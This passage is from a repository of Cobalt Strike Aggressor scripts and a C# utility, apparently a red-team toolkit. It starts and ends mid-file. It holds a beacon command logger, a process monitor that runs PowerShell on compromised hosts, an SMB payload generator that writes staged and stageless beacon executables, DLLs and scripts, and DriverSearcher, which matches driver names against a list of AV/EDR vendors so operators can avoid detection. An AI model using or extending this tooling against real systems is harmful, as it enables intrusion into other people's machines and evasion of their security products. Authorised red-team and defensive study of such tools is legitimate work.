    $model = [new GenericTableModel: @("operator", "ip", "hostname", "user", "pid", "command", "timestamp"), "beacon", 16];
    $table = [new ATable: $model];

    # Header-click sorting; column 3 is toggled once so the table starts sorted on it.
    $sorter = [new TableRowSorter: $model];
    [$sorter toggleSortOrder: 3];

    # Columns 0-2 compare as strings, column 3 numerically.
    # NOTE(review): column 3 is "user" in the model above, so a numeric <=>
    # comparator there looks like it was meant for "pid" (column 4) - confirm.
    foreach $col (@(0, 1, 2)) {
        [$sorter setComparator: $col, { return $1 cmp $2; }];
    }
    [$sorter setComparator: 3, { return $1 <=> $2; }];
    [$table setRowSorter: $sorter];

    # Scroll pane hosting the table (this is the component returned to the caller).
    $content = [new JScrollPane: $table];

    # Right-click menu for the table rows.
    setupPopupMenu($table, "command_log");

    # Initial fill.
    updateTable();

    # Register the visualization with CS
    addVisualization("Beacon Command Log", $content);
    return $content;
}
102 |
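popup command_log {
    # Right-click menu of the command-log table: copies the selected rows to
    # the clipboard, one line each, in the same layout Logger.cna writes.
    item "Copy" {
        println("Right click captured!");
        $selected = "";
        foreach $row ([$table getSelectedRows]) {
            # getSelectedRows returns *view* indices; once the user has sorted
            # the table those differ from the model's row order, so map each
            # one back to the model index before reading cells.
            $modelRow = [$table convertRowIndexToModel: $row];
            # operator [ip_hostname] user/proc | timestamp> command
            $operator = [$model getValueAt: $modelRow, 0];
            $ip = [$model getValueAt: $modelRow, 1];
            $hostname = [$model getValueAt: $modelRow, 2];
            $user = [$model getValueAt: $modelRow, 3];
            $proc = [$model getValueAt: $modelRow, 4];
            $time = [$model getValueAt: $modelRow, 6];
            $command = [$model getValueAt: $modelRow, 5];

            $selected .= "$operator \[$ip\_$hostname\] $user\/$proc | $time\> $command\n";
        }
        add_to_clipboard($selected);
    }
}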
122 |
popup view {
    # Adds "Command Log" to the View menu; each click opens a new tab with a
    # freshly built visualization (createVisualization re-creates $model and
    # $table, so the globals point at the most recently opened tab).
    item "Command Log" {
        # Show the visualization
        addTab("Beacon Command Log", createVisualization(), "All commands you have executed in a beacon");
    }
}
129 |
# Refresh the table after every operator input; updateTable rebuilds the
# whole model (it does not append just the new line).
on beacon_input {
    updateTable();
}
133 |
--------------------------------------------------------------------------------
/ProcessMonitor.cna:
--------------------------------------------------------------------------------
1 | #Process Monitor
2 | #Author: @r3dQu1nn
3 | #Queries the processes at a set interval to see what processes have been started since that interval time
4 | #Thanks to @Alyssa (ramen0x3f) for the code snippets! Big thanks to @i_am_excite for the powershell code!
5 | #Big thanks to raffi for the on heartbeat help!
6 |
#Global Variables
# $timer is "" (idle), "Start" or "Stop"; $interval is the label of the
# heartbeat that re-runs Get-Proc. Both are read by the heartbeat handlers
# below, together with $bid (set by the alias), so only one beacon is
# monitored at a time.
$timer = "";
$interval = "5m";
# NOTE(review): include() loads an Aggressor (.cna) script; feeding it the
# PowerShell file looks wrong - the alias below imports the .ps1 into the
# beacon with bpowershell_import, which is what actually uses it. Confirm
# this include is needed.
include(script_resource("ProcessMonitor.ps1"));

#Register Alias for Process Monitor
beacon_command_register("ProcessMonitor",
    "Start/Stop and Change the Interval Time for Process Monitor",
    "Synopsis: ProcessMonitor [Start/Stop] [Time]\n" .
    "Options: 1m, 5m (default), 10m, 20m, 30m. If no time supplied, default of 5m is used.");
17 |
18 | #Process Monitor alias
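# Start monitoring on beacon $1 at interval $2 (one of "1m","5m","10m","20m",
# "30m"), provided ProcessMonitor.ps1 sits next to this script; otherwise
# reset the monitor state and report the missing file.
# Sets the script globals $bid, $timer and $interval read by the heartbeat
# handlers.
sub startProcessMonitor {
    local('$script $minutes');
    $script = script_resource("ProcessMonitor.ps1");
    if (-exists $script) {
        $bid = $1;
        $timer = "Start";
        $interval = $2;
        # "10m" -> "10": Get-Proc takes the interval in minutes.
        $minutes = strrep($2, "m", "");
        blog($1, "\c9Process Monitor Started! Time Interval is set to " . $interval);
        blog($1, "\c4Run ProcessMonitor [Stop] to stop ProcessMonitor from running continuously.");
        blog($1, "\cBDepending on your sleep time, results might come before or after checkin.");
        bpowershell_import!($1, $script);
        bpowerpick!($1, 'Get-Proc ' . $minutes);
    }
    else {
        $timer = "";
        $interval = "5m";
        berror($1, "\c4ProcessMonitor.ps1 does not exist!");
        show_message("ProcessMonitor.ps1 does not exist!");
    }
}

#Process Monitor alias
# Usage: ProcessMonitor [Start|Stop] [1m|5m|10m|20m|30m]
# $1 = beacon id, $2 = action, $3 = interval. "Start" with no interval uses
# the documented default of 5m. Anything else that is not "Stop" is reported
# as a bad interval (the original's always-true "!=" chain had the same
# effect for every unrecognised input).
alias ProcessMonitor {
    local('$action $time');
    $action = $2;
    $time = $3;

    if ($action is $null) {
        blog($1, "\c4Please provide 'Start' then a correct time interval to Start Process Monitor.");
        show_message("Please provide 'Start' then a correct time interval to Start Process Monitor.");
    }
    else if ($action eq 'Stop') {
        $timer = "Stop";
        $interval = "5m";
        blog($1, "\cBProcess Monitor has Stopped.");
    }
    else if ($action eq 'Start' && ($time is $null || $time eq '')) {
        # Documented default when no interval is supplied.
        startProcessMonitor($1, '5m');
    }
    else if ($action eq 'Start' && $time in @("1m", "5m", "10m", "20m", "30m")) {
        startProcessMonitor($1, $time);
    }
    else {
        blog($1, "\c4Please provide a correct time interval to Start Process Monitor.");
        show_message("Please provide a correct time interval to Start Process Monitor.");
    }
}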
128 |
129 | #Process Monitor heartbeat checks
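# Shared body of the heartbeat handlers: when monitoring is on and the
# configured interval matches the heartbeat that fired, re-run Get-Proc on
# the beacon recorded in $bid by the alias (only the most recent "Start"
# beacon is tracked). $1 = interval label, $2 = minutes passed to Get-Proc.
# The "Stop" and idle states need no action, so the empty branches of the
# original handlers are gone.
sub processMonitorTick {
    if ($timer eq 'Start' && $interval eq $1) {
        bpowerpick!($bid, 'Get-Proc ' . $2);
    }
}

on heartbeat_1m {
    processMonitorTick('1m', '1');
}

on heartbeat_5m {
    processMonitorTick('5m', '5');
}

on heartbeat_10m {
    processMonitorTick('10m', '10');
}

on heartbeat_20m {
    processMonitorTick('20m', '20');
}

on heartbeat_30m {
    processMonitorTick('30m', '30');
}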
--------------------------------------------------------------------------------
/Logging/Logger.cna:
--------------------------------------------------------------------------------
1 | ## Logging only script with color coded process list
2 | # Need av_hips_executables.txt file in the same folder as this script.
3 | # To consolidate all logs please load this script, av_hips_executables.txt, and logs.py in /opt/cobaltstrike/ directory
4 | # Author: @r3dQu1nn
5 | ##
6 |
#Custom Directories for logging
# Created on the machine running this script when it loads. operator_input/
# receives this operator's typed commands, beacon_output/ the per-beacon
# output; logs.py reads both from these exact paths.
mkdir("/opt/cobaltstrike/logs/operator_logs");
mkdir("/opt/cobaltstrike/logs/operator_logs/beacon_output");
mkdir("/opt/cobaltstrike/logs/operator_logs/operator_input");
11 |
12 | #Logging Menubar
# Menubar entry that runs logs.py for the current operator.
menubar("Export OP Logs", "exportlogs", 2);
popup exportlogs {
    item "&Export OP Logs to HTML" {
        prompt_confirm("Do you want to consolidate all OP Logs? (Recommended for Post Operation)", "Log Consolidation", {
            show_message("Consolidating all OP Logs...");
            # Relative path: logs.py must be in the working directory of the
            # client process (the README says /opt/cobaltstrike). The nick is
            # appended to the command line unquoted; the script's output file
            # name is derived from it.
            exec("python logs.py " . mynick());
        });
    }
}
22 |
23 | global(@avlist);
24 |
25 | ## Set logging input/outputs
## Set logging input/outputs
# Console rendering of an operator's input line.
# $1 = beacon id, $2 = operator nick, $3 = text, $4 = timestamp.
set BEACON_INPUT {
    local('$who $meta');
    $bd = bdata($1);
    # Another operator's line is prefixed with their nick; our own is not.
    $who = iff($2 eq mynick(), "", "$2 ");
    $meta = "[" . $bd['computer'] . "]" . $bd['user'] . "/" . $bd['pid'] . "|" . formatDate($4, 'yyyyMMMdd HH:mm:ss');
    return "\U" . mynick() . "\U" . $who . "\U" . $meta . "\o> $3";
}
34 |
# Append our own input lines (other operators' are ignored) to today's
# per-operator file under operator_input/. logs.py parses this exact layout:
#   nick[internal_computer]user/pid|yyyyMMMdd HH:mm:ss> command
# $1 = beacon id, $2 = operator nick, $3 = text, $4 = timestamp.
on beacon_input {
    local('$in $logfile');
    $bd = bdata($1);

    if ($2 ne mynick()) {
        return;
    }

    $logfile = "/opt/cobaltstrike/logs/operator_logs/operator_input/" . formatDate($4, 'yyyyMMMdd') . "_" . mynick() . ".log";
    $in = openf(">>" . $logfile);
    writeb($in, mynick() . "[" . $bd['internal'] . "_" . $bd['computer'] . "]" . $bd['user'] . "/" . $bd['pid'] . "|" . formatDate($4, 'yyyyMMMdd HH:mm:ss') . "> $3" . "\n");
    closef($in);
}
47 |
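# Append one beacon output record (a header line, then the text) to that
# beacon's daily output log under beacon_output/.
# $1 = beacon id, $2 = text, $3 = timestamp.
# The three handlers below were byte-identical copies of this body.
sub logBeaconOutput {
    local('$bd $out $ip $host $path');
    $bd = bdata($1);

    # The IP and computer name come from the beacon's own metadata, i.e. from
    # the compromised host. They are spliced into a file path, so strip path
    # separators to keep a crafted name from steering the write outside the
    # log directory. Normal names are unchanged, so logs.py still finds them.
    $ip = strrep($bd['internal'], "/", "_");
    $host = strrep($bd['computer'], "/", "_");
    $path = "/opt/cobaltstrike/logs/operator_logs/beacon_output/" . formatDate($3, 'yyyyMMMdd') . "_" . $ip . "_" . $host . "_output.log";

    $out = openf(">>" . $path);
    println($out, mynick() . "[" . $bd['computer'] . "]" . $bd['user'] . "/" . $bd['pid'] . "|" . formatDate($3, 'yyyyMMMdd HH:mm:ss') . "\n");
    println($out, "$2" . "\n");
    closef($out);
}

on beacon_output {
    logBeaconOutput($1, $2, $3);
}

on beacon_output_alt {
    logBeaconOutput($1, $2, $3);
}

on beacon_tasked {
    logBeaconOutput($1, $2, $3);
}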
87 |
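# Log raw "ps" output to the beacon's daily output log, then return a
# colour-highlighted process list for the console.
# $1 = beacon id, $2 = raw ps output (tab-separated columns), $3 = timestamp.
# Fixes over the original: the av_hips_executables.txt handle was never
# closed, and the file was re-read and re-pushed into @avlist on every ps.
set BEACON_OUTPUT_PS {
    local('$bd $out $ip $host $handle $line $color $row');
    local('$outps $temp $name $ppid $pid $arch $user $session @ps');
    $bd = bdata($1);

    # Beacon metadata comes from the compromised host; strip path separators
    # before using it in a file name.
    $ip = strrep($bd['internal'], "/", "_");
    $host = strrep($bd['computer'], "/", "_");
    $out = openf(">>/opt/cobaltstrike/logs/operator_logs/beacon_output/" . formatDate($3, 'yyyyMMMdd') . "_" . $ip . "_" . $host . "_output.log");
    println($out, mynick() . "[" . $bd['computer'] . "]" . $bd['user'] . "/" . $bd['pid'] . "|" . formatDate($3, 'yyyyMMMdd HH:mm:ss') . "\n");
    println($out, "$2" . "\n");
    closef($out);

    # Load the AV/HIPS executable names (one per line) once per script load.
    if (size(@avlist) == 0) {
        $handle = openf(script_resource("av_hips_executables.txt"));
        while $line (readln($handle)) {
            push(@avlist, $line);
        }
        closef($handle);
    }

    $outps .= "\cC[*]\o Process List with process highlighting of AV/HIPS, Browsers, Explorer/Winlogon, current processes\n";
    $outps .= "\cC[*]\o Current Running PID: \c8 Yellow \o \n";
    $outps .= "\cC[*]\o AV/HIPS: \c4 RED \o \n";
    $outps .= "\cC[*]\o Browsers: \c3 GREEN \o \n";
    $outps .= "\cC[*]\o Explorer/Winlogon: \c2 BLUE \o \n\n";
    $outps .= " PID PPID Name Arch Session User\n";
    $outps .= "\cE --- ---- ---- ---- ------- -----\n";

    foreach $temp (split("\n", ["$2" trim])) {
        ($name, $ppid, $pid, $arch, $user, $session) = split("\t", $temp);

        # Pick the highlight colour; "" means plain. Order matters: an AV
        # process that is also our own PID is shown RED, not YELLOW.
        if ($name in @avlist) {
            $color = "\c4";
        } else if ($name eq "explorer.exe" || $name eq "winlogon.exe") {
            $color = "\c2";
        } else if ($name eq "chrome.exe" || $name eq "firefox.exe" || $name eq "iexplore.exe") {
            $color = "\c3";
        } else if ($pid eq $bd['pid']) {
            $color = "\c8";
        } else {
            $color = "";
        }

        # Fixed-width columns; a highlighted row is wrapped in colour code / reset.
        $row = " $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user";
        if ($color ne "") {
            $row = $color . $row . " \o";
        }
        push(@ps, %(pid => $pid, entry => $row));
    }

    # sort the processes by PID
    sort({ return $1['pid'] <=> $2['pid']; }, @ps);

    # append to our outstring
    foreach $temp (@ps) {
        $outps .= "$temp['entry'] \n";
    }

    return $outps;
}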
154 |
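# Formats the output of Beacon's "ls" command after logging the raw output.
# $1 = beacon id, $2 = raw tab-separated listing (first line is the folder, then type, size,
# modified, name per entry), $3 = timestamp. Returns the sorted table Beacon displays.
#
# Fix relative to the original: the log line was written as "$outls . $2" before $outls had been
# declared local, i.e. it referenced the script-global $outls (empty unless some other script sets
# it). The raw output is now logged on its own, and all variables are declared up front.
set BEACON_OUTPUT_LS {
    local('$bd $out $outls @results $cwd $entry $type $size $modified $name');

    $bd = bdata($1);

    $out = openf(">>/opt/cobaltstrike/logs/operator_logs/beacon_output/" . formatDate($3, 'yyyyMMMdd') . "_" . $bd['internal'] . "_" . $bd['computer'] . "_output.log");
    println($out, mynick() . "[" . $bd['computer'] . "]" . $bd['user'] . "/" . $bd['pid'] . "|" . formatDate($3, 'yyyyMMMdd HH:mm:ss') . "\n");
    println($out, "$2" . "\n");
    closef($out);

    @results = split("\n", ["$2" trim]);

    # first entry is the current folder; drop its trailing character as the original did
    $cwd = left(shift(@results), -1);

    # Replace each raw line with a hash describing it; "." / ".." and unknown types are dropped.
    foreach $entry (@results) {
        ($type, $size, $modified, $name) = split("\t", $entry);
        if ($type eq "F") {
            $entry = %(type => "fil", size => format_size($size), modified => $modified, name => $name);
        }
        else if ($type eq "D" && $name ne "." && $name ne "..") {
            $entry = %(type => "dir", size => "", modified => $modified, name => $name);
        }
        else {
            remove();
        }
    }

    # alphabetical, directories first ("dir" sorts before "fil")
    sort({ return ($1['type'] . lc($1['name'])) cmp ($2['type'] . lc($2['name'])); }, @results);

    $outls .= "\cC[*]\o Listing: $cwd $+ \n\n";
    $outls .= " Size Type Last Modified Name\n";
    $outls .= "\cE ---- ---- ------------- ----\n";

    foreach $entry (@results) {
        ($type, $size, $modified, $name) = values($entry, @('type', 'size', 'modified', 'name'));
        $outls .= " $[8]size $[7]type $[21]modified $name $+ \n";
    }

    return $outls;
}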
200 |
--------------------------------------------------------------------------------
/SMBPayloadGenerator.cna:
--------------------------------------------------------------------------------
1 | #SMB Artifact Payload Generator
2 | #Author: @r3dQu1nn
3 | #Generates any type of Stageless/Staged Payload based off a SMB Listener
4 |
5 | #Custom Directory for Payloads
# Output directories on the client host; both generator callbacks write into these.
mkdir("/opt/cobaltstrike/SMB_Staged_Payloads");
mkdir("/opt/cobaltstrike/SMB_Stageless_Payloads");

# Top-level menu entry with one item per dialog (staged / stageless).
menubar("SMB Payload Generator", "payloadgenerator", 2);
popup payloadgenerator {
    menu "&SMB Payload Generator" {
        item "&SMB Staged Payloads" {
            payloadgeneratestaged();
        }
        item "&SMB Stageless Payloads" {
            payloadgeneratestageless();
        }
    }
}
20 |
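# Shows the staged-payload dialog. Its values arrive in &Staged_Output as $3 under the keys
# listener, Name, payload_type and Output. $dialog is now local; the original left the handle
# in script scope, shared with the stageless dialog.
sub payloadgeneratestaged {
    local('$dialog');

    $dialog = dialog("SMB Payload Generator", %(listener => "Listener: ", payload_type => "Payload Type: ", Output => "Output: "), &Staged_Output);
    dialog_description($dialog, "Generates a Staged or Stageless SMB Payload based on the selected SMB listener. **Payloads will be stored in /opt/cobaltstrike/SMB_Staged_Payloads**");
    drow_listener_smb($dialog, "listener", "Listener: ");
    drow_text($dialog, "Name", "Payload Name: ");
    drow_combobox($dialog, "payload_type", "Payload Type: ", @("Staged"));
    drow_combobox($dialog, "Output", "Output: ", @("dll", "dllx64", "exe", "powershell", "python", "svcexe", "vbscript"));
    dbutton_action($dialog, "Generate");
    dialog_show($dialog);
}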
33 |
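# Shows the stageless-payload dialog. Its values arrive in &Stageless_Output as $3 under the keys
# listener, Name, payload_type and Output. $dialog is now local; the original left the handle
# in script scope, shared with the staged dialog.
sub payloadgeneratestageless {
    local('$dialog');

    $dialog = dialog("SMB Payload Generator", %(listener => "Listener: ", payload_type => "Payload Type: ", Output => "Output: "), &Stageless_Output);
    dialog_description($dialog, "Generates a Staged or Stageless SMB Payload based on the selected SMB listener. **Payloads will be stored in /opt/cobaltstrike/SMB_Stageless_Payloads**");
    drow_listener_smb($dialog, "listener", "Listener: ");
    drow_text($dialog, "Name", "Payload Name: ");
    drow_combobox($dialog, "payload_type", "Payload Type: ", @("Stageless"));
    drow_combobox($dialog, "Output", "Output: ", @("dll", "dllx64", "exe", "powershell", "svcexe", "raw"));
    dbutton_action($dialog, "Generate");
    dialog_show($dialog);
}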
46 |
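# Dialog callback for the staged generator: $1 = dialog handle, $2 = button label,
# $3 = dialog values (keys: listener, Name, payload_type, Output).
#
# Changes relative to the original: the seven near-identical branches are driven by one table;
# the listener is validated as well as the name (the original's error message already claimed
# both were checked); and because the name becomes part of the output path, names containing
# anything other than letters, digits, spaces, '.', '_' and '-' (or containing "..") are rejected,
# so a name can no longer point the write outside SMB_Staged_Payloads. The
# payload_type eq 'Staged' test the original applied to three branches was always true (the
# combobox offers only "Staged") and is not repeated here.
sub Staged_Output {
    local('%kinds $kind $name $listener $path $data $handle');

    # Output value => (file extension, label used in the confirmation message).
    # Extensions are kept as the original wrote them, including the extension-less powershell file.
    %kinds = %(
        dll        => @(".dll", "SMB DLL"),
        dllx64     => @(".dll", "64 bit SMB DLL"),
        exe        => @(".exe", "EXE"),
        powershell => @("",     "Powershell SMB Payload"),
        python     => @(".py",  "Python SMB Payload"),
        svcexe     => @(".exe", "SVCEXE"),
        vbscript   => @(".vbs", "vbscript SMB Payload")
    );

    $name = $3['Name'];
    $listener = $3['listener'];

    if ("$name" eq "" || "$listener" eq "") {
        berror($1, 'You did not select a proper SMB Listener or Input a Payload Name!');
        show_message("Please select a proper SMB Listener and Input a Payload Name!");
    }
    else if ("$name" ismatch '.*[^A-Za-z0-9 _.-].*' || "$name" ismatch '.*[.][.].*') {
        berror($1, 'Payload Name may only contain letters, digits, spaces, ".", "_" and "-"');
        show_message("Payload Name may only contain letters, digits, spaces, '.', '_' and '-'");
    }
    else if ($3['Output'] in %kinds) {
        $kind = %kinds[$3['Output']];
        $path = "/opt/cobaltstrike/SMB_Staged_Payloads/" . $name . $kind[0];

        # The Output value doubles as the artifact type name, exactly as in the original branches.
        $data = artifact($listener, $3['Output']);
        $handle = openf(">" . $path);
        writeb($handle, $data);
        closef($handle);

        show_message("Saved " . $kind[1] . " at " . $path);
        clear($3);
    }
}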
113 |
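# Dialog callback for the stageless generator: $1 = dialog handle, $2 = button label,
# $3 = dialog values (keys: listener, Name, payload_type, Output).
#
# Changes relative to the original: one dispatch table instead of six branches; the listener is
# validated as well as the name; names that could escape SMB_Stageless_Payloads are rejected (the
# name is used by the callbacks to build the output path); and $Name is assigned before
# artifact_stageless is called rather than after, so a callback that runs promptly cannot see the
# previous generation's name.
sub Stageless_Output {
    local('%callbacks $name $listener');

    # Output value => callback that receives the generated artifact ($1) and writes it to disk.
    %callbacks = %(
        dll        => &dll,
        dllx64     => &dllx64,
        exe        => &exe,
        powershell => &ps1,
        raw        => &raw,
        svcexe     => &svcexe
    );

    $name = $3['Name'];
    $listener = $3['listener'];

    if ("$name" eq "" || "$listener" eq "") {
        berror($1, 'You did not select a proper SMB Listener or Input a Payload Name!');
        show_message("Please select a proper SMB Listener and Input a Payload Name!");
    }
    else if ("$name" ismatch '.*[^A-Za-z0-9 _.-].*' || "$name" ismatch '.*[.][.].*') {
        berror($1, 'Payload Name may only contain letters, digits, spaces, ".", "_" and "-"');
        show_message("Payload Name may only contain letters, digits, spaces, '.', '_' and '-'");
    }
    else if ($3['Output'] in %callbacks) {
        # $Name is deliberately script-global: the &dll/&dllx64/&exe/&ps1/&raw/&svcexe callbacks
        # read it when the artifact is delivered, which may happen after this sub has returned.
        # Two generations started close together therefore share it.
        $Name = "$name";

        # NOTE(review): "x86" is passed as the arch for every Output value, including dllx64,
        # exactly as in the original — confirm that is intended.
        artifact_stageless($listener, $3['Output'], "x86", "", %callbacks[$3['Output']]);
    }
}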
146 |
147 | #Sub Functions for Stageless Artifacts
# Stageless callback for the "dll" output: $1 holds the generated artifact bytes.
# Writes them to /opt/cobaltstrike/SMB_Stageless_Payloads/<$Name>.dll, where $Name is the
# script-global set by &Stageless_Output, and reports the path to the operator.
sub dll {
    local('$path $fh');

    $path = "/opt/cobaltstrike/SMB_Stageless_Payloads/" . $Name . ".dll";
    $fh = openf(">" . $path);
    writeb($fh, $1);
    closef($fh);

    show_message("Saved SMB DLL at " . $path);
}
158 |
# Stageless callback for the "dllx64" output: $1 holds the generated artifact bytes.
# Writes them to /opt/cobaltstrike/SMB_Stageless_Payloads/<$Name>.dll (same extension as the
# x86 DLL, so the two overwrite each other for the same name). $Name is the script-global set
# by &Stageless_Output.
sub dllx64 {
    local('$path $fh');

    $path = "/opt/cobaltstrike/SMB_Stageless_Payloads/" . $Name . ".dll";
    $fh = openf(">" . $path);
    writeb($fh, $1);
    closef($fh);

    show_message("Saved 64 bit SMB DLL at " . $path);
}
169 |
# Stageless callback for the "exe" output: $1 holds the generated artifact bytes.
# Writes them to /opt/cobaltstrike/SMB_Stageless_Payloads/<$Name>.exe; $Name is the
# script-global set by &Stageless_Output.
sub exe {
    local('$path $fh');

    $path = "/opt/cobaltstrike/SMB_Stageless_Payloads/" . $Name . ".exe";
    $fh = openf(">" . $path);
    writeb($fh, $1);
    closef($fh);

    show_message("Saved EXE at " . $path);
}
180 |
# Stageless callback for the "powershell" output: $1 holds the generated artifact bytes.
# Writes them to /opt/cobaltstrike/SMB_Stageless_Payloads/<$Name> with no extension appended
# (as the original did); $Name is the script-global set by &Stageless_Output.
sub ps1 {
    local('$path $fh');

    $path = "/opt/cobaltstrike/SMB_Stageless_Payloads/" . $Name;
    $fh = openf(">" . $path);
    writeb($fh, $1);
    closef($fh);

    show_message("Saved Powershell SMB Payload at " . $path);
}
191 |
# Stageless callback for the "raw" output: $1 holds the generated artifact bytes.
# Writes them to /opt/cobaltstrike/SMB_Stageless_Payloads/<$Name>.bin; $Name is the
# script-global set by &Stageless_Output.
sub raw {
    local('$path $fh');

    $path = "/opt/cobaltstrike/SMB_Stageless_Payloads/" . $Name . ".bin";
    $fh = openf(">" . $path);
    writeb($fh, $1);
    closef($fh);

    show_message("Saved Raw SMB Payload at " . $path);
}
202 |
# Stageless callback for the "svcexe" output: $1 holds the generated artifact bytes.
# Writes them to /opt/cobaltstrike/SMB_Stageless_Payloads/<$Name>.exe (same path the "exe"
# callback uses for the same name); $Name is the script-global set by &Stageless_Output.
sub svcexe {
    local('$path $fh');

    $path = "/opt/cobaltstrike/SMB_Stageless_Payloads/" . $Name . ".exe";
    $fh = openf(">" . $path);
    writeb($fh, $1);
    closef($fh);

    show_message("Saved EXE at " . $path);
}
213 |
--------------------------------------------------------------------------------
/DriverSearcher/DriverSearcher/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.IO;
6 |
7 | namespace DriverSearcher
8 | {
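/// <summary>
/// Walks C:\Windows\System32\drivers and reports which known AV/EDR vendor driver
/// file names are present.
/// </summary>
class Program
{
    /// <summary>Root of the driver search; sub-directories are included.</summary>
    private const string DriverRoot = "C:\\Windows\\System32\\drivers\\";

    /// <summary>
    /// Driver file name => vendor message, compared case-insensitively. The entries are exactly
    /// the original switch's case labels. Four of those labels (SISIPSFileFilter.sys, Parity.sys,
    /// CSBoot.sys, CSDeviceControl.sys) contained upper-case letters, so the original
    /// ToLower()-then-switch could never reach them; the comparer makes them match.
    /// </summary>
    private static readonly Dictionary<string, string> KnownDrivers = BuildKnownDrivers();

    static void Main(string[] args)
    {
        // File name as found on disk => vendor message. Indexer assignment instead of
        // Hashtable.Add: the recursive search can return the same file name from more than one
        // sub-directory, and Add threw ArgumentException on the repeat.
        Dictionary<string, string> matches = new Dictionary<string, string>();

        Console.WriteLine("[*] Twitter: @r3dQu1nn");
        Console.WriteLine("[*] Checking for installed EDR Products... [*]");

        foreach (string filepath in EnumerateFiles(DriverRoot))
        {
            string filename = Path.GetFileName(filepath);
            string vendor;
            if (KnownDrivers.TryGetValue(filename, out vendor))
            {
                matches[filename] = vendor;
            }
        }

        if (matches.Count == 0)
        {
            Console.WriteLine();
            Console.WriteLine("[+] No EDR Products found. [+]");
            Console.WriteLine("[+] Keep in mind that Cloud-Based EDR solutions could be present. [+]");
        }
        else
        {
            Console.WriteLine();
            Console.WriteLine("[!] Alert!! The following EDR products were found:");
            Console.WriteLine("[!] Be careful what you execute!");
            Console.WriteLine("[!] Vendor Information:");
            Console.WriteLine();
            foreach (string key in matches.Keys)
            {
                Console.WriteLine("\t{0} - {1}", key, matches[key]);
            }
        }
        Console.WriteLine();
        Console.WriteLine("[+] Done!");
        Console.WriteLine("[+] Happy Hacking!");
    }

    /// <summary>
    /// Yields every file below <paramref name="root"/>, recursing into sub-directories.
    /// Unlike Directory.GetFiles(root, "*.*", SearchOption.AllDirectories), which the original
    /// used, a directory that cannot be read is reported on stderr and skipped instead of
    /// aborting the whole scan with an unhandled exception.
    /// </summary>
    private static IEnumerable<string> EnumerateFiles(string root)
    {
        Stack<string> pending = new Stack<string>();
        pending.Push(root);
        while (pending.Count > 0)
        {
            string dir = pending.Pop();
            string[] files;
            string[] subdirs;
            try
            {
                files = Directory.GetFiles(dir);
                subdirs = Directory.GetDirectories(dir);
            }
            catch (UnauthorizedAccessException)
            {
                Console.Error.WriteLine("[!] Skipping unreadable directory: {0}", dir);
                continue;
            }
            catch (IOException ex)
            {
                Console.Error.WriteLine("[!] Skipping {0}: {1}", dir, ex.Message);
                continue;
            }
            // yield must stay outside the try/catch above (C# forbids yield inside a try with a catch)
            foreach (string file in files)
            {
                yield return file;
            }
            foreach (string subdir in subdirs)
            {
                pending.Push(subdir);
            }
        }
    }

    /// <summary>Maps every name in <paramref name="names"/> to <paramref name="vendor"/>.</summary>
    private static void AddDrivers(Dictionary<string, string> map, string vendor, params string[] names)
    {
        foreach (string name in names)
        {
            map[name] = vendor;
        }
    }

    /// <summary>Builds the case-insensitive driver-name table from the original vendor groups.</summary>
    private static Dictionary<string, string> BuildKnownDrivers()
    {
        Dictionary<string, string> map = new Dictionary<string, string>(StringComparer.OrdinalIgnoreCase);
        AddDrivers(map, "Windows Defender Found!", "wdnisdrv.sys");
        AddDrivers(map, "FireEye Found!", "fekern.sys", "wfp_mrt.sys");
        AddDrivers(map, "Raytheon Cyber Solutions Found!", "eaw.sys");
        AddDrivers(map, "CJSC Returnil Software Found!", "rvsavd.sys");
        AddDrivers(map, "Verdasys Inc. Found!", "dgdmk.sys");
        AddDrivers(map, "Altiris (Symantec) Found!", "atrsdfw.sys");
        AddDrivers(map, "Malwarebytes Found!", "mbamwatchdog.sys");
        AddDrivers(map, "ESET Found!", "edevmon.sys", "ehdrv.sys");
        AddDrivers(map, "SentinelOne Found!", "sentinelmonitor.sys");
        AddDrivers(map, "BitDefender Found!", "edrsensor.sys", "hbflt.sys", "bdsvm.sys", "gzflt.sys", "bddevflt.sys", "avckf.sys", "atc.sys", "avc3.sys", "trufos.sys", "bdsandbox.sys");
        AddDrivers(map, "Hexis Cyber Solutions Found!", "hexisfsmonitor.sys");
        AddDrivers(map, "Cylance Inc. Found!", "cyoptics.sys", "cyprotectdrv32.sys", "cyprotectdrv64.sys");
        AddDrivers(map, "Avast Found!", "aswsp.sys");
        AddDrivers(map, "McAfee Found!", "mfeaskm.sys", "epdrv.sys", "mfencfilter.sys", "mfencoas.sys", "mfehidk.sys", "swin.sys", "hdlpflt.sys", "mfprom.sys", "mfeeeff.sys");
        AddDrivers(map, "Dell Secureworks Found!", "groundling32.sys", "groundling64.sys");
        AddDrivers(map, "AVG Technologies Found!", "avgtpx86.sys", "avgtpx64.sys");
        AddDrivers(map, "Symantec Found!", "pgpwdefs.sys", "geprotection.sys", "diflt.sys", "sysmon.sys", "ssrfsf.sys", "emxdrv2.sys", "reghook.sys", "spbbcdrv.sys", "bhdrvx86.sys", "bhdrvx64.sys", "SISIPSFileFilter.sys", "symevent.sys", "vxfsrep.sys", "virtfile.sys", "symafr.sys", "symefasi.sys", "symefa.sys", "symefa64.sys", "symhsm.sys", "evmf.sys", "gefcmp.sys", "vfsenc.sys", "pgpfs.sys", "fencry.sys", "symrg.sys");
        AddDrivers(map, "SAFE-Cyberdefense Found!", "safe-agent.sys");
        AddDrivers(map, "CyberArk Software Found!", "cybkerneltracker.sys");
        AddDrivers(map, "Kaspersky Found!", "klifks.sys", "klifaa.sys", "klifsm.sys");
        AddDrivers(map, "Sophos Found!", "savonaccess.sys", "sld.sys");
        AddDrivers(map, "Webroot Software, Inc. Found!", "ssfmonm.sys");
        AddDrivers(map, "Carbon Black Found!", "carbonblackk.sys", "Parity.sys", "cbk7.sys", "cbstream.sys");
        AddDrivers(map, "Cybereason Found!", "crexecprev.sys");
        AddDrivers(map, "CrowdStrike Found!", "im.sys", "csagent.sys", "CSBoot.sys", "CSDeviceControl.sys", "cspcm2.sys");
        AddDrivers(map, "Comodo Security Solutions Found!", "cfrmd.sys", "cmdccav.sys", "cmdguard.sys", "cmdmnefs.sys", "mydlpmf.sys");
        AddDrivers(map, "Panda Security Found!", "psinproc.sys", "psinfile.sys", "amfsm.sys", "amm8660.sys", "amm6460.sys");
        AddDrivers(map, "F-Secure Found!", "fsgk.sys", "fsatp.sys", "fshs.sys");
        AddDrivers(map, "Endgame Found!", "esensor.sys");
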